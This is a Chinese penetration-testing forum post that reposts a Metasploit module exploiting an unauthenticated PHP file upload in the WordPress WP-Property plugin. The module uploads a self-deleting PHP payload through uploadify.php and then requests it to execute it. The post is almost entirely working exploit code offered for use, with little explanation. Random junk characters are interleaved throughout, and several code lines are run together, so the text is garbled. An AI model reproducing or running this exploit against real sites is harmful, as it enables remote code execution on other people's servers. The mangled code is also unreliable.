中国网络渗透测试联盟
标题:
WordPress WP-Property PHP 文件上传漏洞
[打印本页]
作者:
admin
时间:
2013-1-4 19:51
标题:
WordPress WP-Property PHP 文件上传漏洞
WordPress WP-Property PHP 文件上传漏洞
3 {4 P6 ~0 W$ U
' m. Y& L; m( @5 C6 d1 C( }
## # This file is part of the Metasploit Framework and may be subject to
/ \" N' g- ?- U% M9 d6 Q5 m# R' x
6 @* T" T9 L2 l: L$ l# L6 K
# redistribution and commercial restrictions. Please see the Metasploit
' ~8 ]+ Z& \) \) w. |
- m( O5 `$ j' G* p9 e
# Framework web site for more information on licensing and terms of use.
0 _4 M: S$ x- U
! {" C" I: `$ z( \. U* c
#
http://metasploit.com/framework/
##
( ~# S' i5 N8 {4 H5 n o/ \5 \
* \5 X" j( q0 @# N- i
( ?% ^% ]! i. M; x
9 A Y4 u/ ~' ]4 V- K! Z
$ s1 ^( B! c. T- H& o! r! b
1 M5 x, F6 R: |7 E1 ]+ |, h) R
require 'msf/core'
" I+ F- d9 k) k8 `: y6 c$ s
require 'msf/core/exploit/php_exe'
% b$ A5 K& |4 q7 G
: d" G' C N5 J5 T# x9 ?
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit:
hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
% S* O x1 ?' N" g. K% U- W: Z
'Description' => %q{
5 Z4 t+ U% |3 h: c! m6 o
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
# T+ ]& U6 y9 ]9 \3 U8 Y
[
" [# V* W' N( q9 @
'Sammy FORGIT', # initial discovery
/ y/ j! n, E/ _/ e! g
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
% w* ]% a( h& p- X5 P8 U; m- Y+ E+ T
],
( J; P, g# Z2 f& k) v
'License' => MSF_LICENSE,
- A1 o5 b) t9 E( M2 ~' X
'References' =>
& S* d4 Y+ A t# X7 s* q
[
4 W; u3 w* K& F- I& g; q* J! O! w
[ 'OSVDB', '82656' ],
7 L' E; R e8 a* I& x+ t
[ 'BID', '53787' ],
! P& A8 N% b# O/ B. ` b6 V+ E
[ 'EDB', '18987'],
. J9 {/ ]" U9 A0 W2 b5 e
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
/ ]5 D1 c: E% T$ }5 V" A4 R9 k
],
- c' f+ ^$ ^1 K8 O* K3 p
'Payload' =>
t5 L/ b% N9 [7 M+ C6 A
{
6 T1 v1 | K2 j3 e# c' i
'BadChars' => "\x00",
8 F) Z- c, I4 L i- O
},
9 {' e7 e/ }: }9 D
'Platform' => 'php',
# n% J& H. |+ T0 R
'Arch' => ARCH_PHP,
6 v( `6 j3 [& K' f
'Targets' =>
- Y1 f5 {. Y& n. @) U
[
# G1 A b5 c% j9 i0 o4 ?
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
- b0 E) m) i; v+ J: O
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
8 P/ H6 F2 Z$ ^# `. |/ c4 h" C
],
' J2 d+ k+ M# |9 C8 D6 z
'DefaultTarget' => 0,
! T4 N4 Z! C7 |. k+ Q9 k
'DisclosureDate' => 'Mar 26 2012'))
7 _8 q* g% H4 u! R- z
- q/ z0 Y/ G' t8 Q+ _. R' n
register_options(
9 j m6 t! [, b# ] R1 z3 f5 }- O
[
' e- u9 R, n+ D; I6 x- [8 ^* l
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
4 r2 Q& _* ^. G, u0 `# g- k$ J3 p$ @
], self.class)
3 w9 R# G8 E$ ]* b
end
. l) ]$ D8 T6 }: b' d. z
; `8 }' _2 D; { \) n
def check
! w5 h0 X8 U5 }
uri = target_uri.path
" a9 ^+ @1 B- ~1 u$ P; v: P
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
; U1 Z1 v+ F) B2 |9 |/ J
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
2 o! |) V3 C6 E2 K, v4 P, \8 I/ U4 W
})
( P$ u, Y- \7 a8 j/ P' B5 Y
1 X/ i$ F/ E7 m, e3 M
if not res or res.code != 200
* O1 h7 L/ D1 s! S/ q' a. I, h
return Exploit::CheckCode::Unknown
* X7 `' N# i% i& n
end
! B8 n( \6 ~- L0 _$ M
; z7 V* m) d0 O4 N1 N* j8 R
return Exploit::CheckCode::Appears
( M' O, ^( R& D; r* X
end
- O! H+ q) y- t9 p. t
# k. ]+ ^# ]- {$ C+ M6 C" K
def exploit
9 T. Z9 u) y' M! E
uri = target_uri.path
# q4 q) L. h$ ^
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
6 v9 k6 i8 U& G- E/ h. V+ u
9 Q5 [. m* R. }% n
data = Rex::MIME::Message.new
5 f- Y7 ^; ?3 q' O# {- ^
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
8 Z! y0 a& M1 A$ m4 M
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
% T, ]1 F& P/ {4 c8 S% H
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
# o5 R* }* H3 b- B1 S, `) @
# S& q) Z$ }) { [: C% c
print_status("#{peer} - Uploading payload #{@payload_name}")
/ l- K2 t1 l+ W6 P; z$ g
res = send_request_cgi({
4 }9 z3 i) D6 v1 Q# P
'method' => 'POST',
" B! g( N* J% V& n
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
, `$ W7 J- U. f3 C Q$ V6 n# k0 z
'ctype' => "multipart/form-data; boundary=#{data.bound}",
G+ C( r2 x8 w% b4 ^0 n( f8 j) @
'data' => post_data
$ m- G T# C) e
})
9 l" }+ V' ^- `9 q+ b$ g
3 J/ w3 U: E; f- s* ~
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
2 D# a' W" B& u" Z& ?, X- X; d( o
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
. u4 ~. T3 l3 ~) e" G
end
+ q+ l! g$ x+ {
* j7 n( P3 i7 i; K# i
upload_uri = res.body
: T; y# ^, Y8 n2 e" B
# R) c; v! J8 j g
print_status("#{peer} - Executing payload #{@payload_name}")
) t5 N$ I- ]5 C0 L9 t
res = send_request_raw({
+ I, Z8 ?2 \. j. z4 [8 Y# o1 F
'uri' => upload_uri,
# W% x4 C, ~+ w# O0 }
'method' => 'GET'
! b, a6 \& u2 a+ T S
})
* y- @/ f, x7 V, P( r7 M
end
: j, ~2 |0 _- x( q2 b" \* W
end
2 ?- e/ r7 D% i0 Z
0 k2 R) X) u+ t) f. d1 U
不要问我这写的是什么 怎么利用 我是说msf.
: U, z4 r" G; j4 P! y+ O
& _0 W# n8 r" P: C2 P! C
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2